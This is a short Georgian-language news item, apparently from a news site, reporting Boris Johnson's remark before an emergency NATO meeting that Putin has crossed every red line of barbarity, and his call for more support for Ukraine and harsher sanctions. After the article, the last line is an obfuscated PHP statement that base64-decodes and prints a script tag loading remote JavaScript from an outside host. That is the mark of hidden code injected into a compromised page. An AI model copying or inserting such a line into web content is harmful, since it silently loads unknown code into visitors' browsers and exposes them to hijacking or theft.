celsiusi
ავერსი საქკაბელი
ბრიტანეთის პრემიერმინისტრის, ბორის ჯონსონის განცხადებით, პუტინმა ბარბაროსობის ყველა ხაზი უკვე გადაკვეთა. მან კომენტარი ნატო-ს საგანგებო სხდომის დაწყებამდე გააკეთა.
 
მისივე თქმით, მოკავშირეებმა უნდა გააძლიერონ მხარდაჭერა უკრაინის მიმართ, გაამკაცრონ ეკონომიკური სანქციები და დაუწესონ ისინი უფრო მეტ ადამიანს.
 
"ვფიქრობ, ვლადიმერ პუტინმა ბარბაროსობის ყველა წითელი ხაზი უკვე გადაკვეთა, ახლა ნატო-ზეა დამოკიდებული რომ დავინახოთ დამატებით რისი გაკეთება შეგვიძლია უკრაინის მოსახლეობისთვის, რათა დაიცვან თავი. დამატებით რისი გაკეთება შეგვიძლია პუტინის რეჟიმზე ეკონომიკური მარწუხების გასაძლიერებლად, ძალიან მნიშვნელოვანია შეძლებისდაგვარად სწრაფად, ერთად ვიმუშაოთ საქმეების დასასრულებლად, რომ სანქციები იყოს უფრო მკაცრი პუტინის რეჟიმის წინააღმდეგ", - თქვა ბორის ჯონსონმა.
 
896
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");